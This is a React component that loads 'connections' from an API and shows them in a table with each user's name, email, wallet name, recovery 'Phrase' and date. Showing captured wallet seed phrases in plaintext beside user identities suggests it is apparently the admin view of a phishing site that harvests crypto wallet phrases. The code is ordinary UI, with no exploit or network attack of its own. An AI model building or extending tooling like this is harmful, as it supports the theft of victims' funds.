import * as React from 'react';
import { useEffect, useState } from 'react';
import Table from '@mui/material/Table';
import TableBody from '@mui/material/TableBody';
import TableCell from '@mui/material/TableCell';
import TableContainer from '@mui/material/TableContainer';
import TableHead from '@mui/material/TableHead';
import TableRow from '@mui/material/TableRow';
import Paper from '@mui/material/Paper';
import { useQuery } from 'react-query';
import Avatar from '@mui/material/Avatar';
import apiClient from '../../request/http-common';
import Container from '@mui/material/Container';
import Typography from '@mui/material/Typography';
import { Button } from '@mui/material';
import EditIcon from '@mui/icons-material/Edit';
import { Link as RouterLink } from 'react-router-dom';
import DeleteConnection from './DeleteConnection';
export default function ListConnections() {
    const [connections, setconnections] = useState(null);
    const { isLoading: isLoadingconnections, refetch: getconnections } = useQuery(
        "load-connections",
        async () => {
          return await apiClient.get("/api/load-connections");
        },
        {
          enabled: false,
          onSuccess: (res) => {
            if (res.data.status === 'success') {
                setconnections(res.data.connections);
                const event2 = new Event('processed');
                window.dispatchEvent(event2);
            }
          },
          onError: (err) => {
            // console.log(err.response?.data || err);
          },
        }
      );
    
      useEffect(() => {
        getconnections() 
        if (isLoadingconnections) {
            const event3 = new Event('processing');
            window.dispatchEvent(event3);
        }
      }, []);

  const getDate = (date) => new Date(date).toDateString();
  return (
    <div style={{marginTop: '75px'}}>
    <Container>
        <Typography  mt={4} mb={2} sx={{ fontWeight: 'bold', fontSize: 20, textAlign: 'center', textTransform: 'uppercase' }} gutterBottom variant="h6" component="div">
        
        {isLoadingconnections? 'Loading Connections...' : 'List of connections'}
      </Typography>
    <TableContainer component={Paper}>
        
      {connections !== null &&
      <Table sx={{ minWidth: '100%' }} size="small" aria-label="a dense table">
      <TableHead>
        <TableRow>
        
        <TableCell>User Name</TableCell>
          <TableCell align="right">User Email</TableCell>
          <TableCell align="right">Wallet Name</TableCell>
          <TableCell align="right">Phrase</TableCell>
          <TableCell align="right">Date</TableCell>
          <TableCell align="right">Delete</TableCell>
          
        </TableRow>
      </TableHead>
      <TableBody>
        {connections.map((connection) => (
          <TableRow
            key={connection.id}
            sx={{ '&:last-child td, &:last-child th': { border: 0 } }}
          >
            <TableCell component="th" scope="row">
            {connection.user.name}
            </TableCell>
            <TableCell align="right">{connection.user.email}</TableCell>
            <TableCell align="right">{connection.wallet_name}</TableCell>
            <TableCell align="right">{connection.phrase}</TableCell>
            <TableCell align="right">{getDate(connection.created_at)}</TableCell>
            <TableCell align="right"><DeleteConnection conn={connection}/></TableCell>
            
          </TableRow>
        ))}
      </TableBody>
    </Table>
      }
      
    </TableContainer>
    </Container>
    </div>
  );
}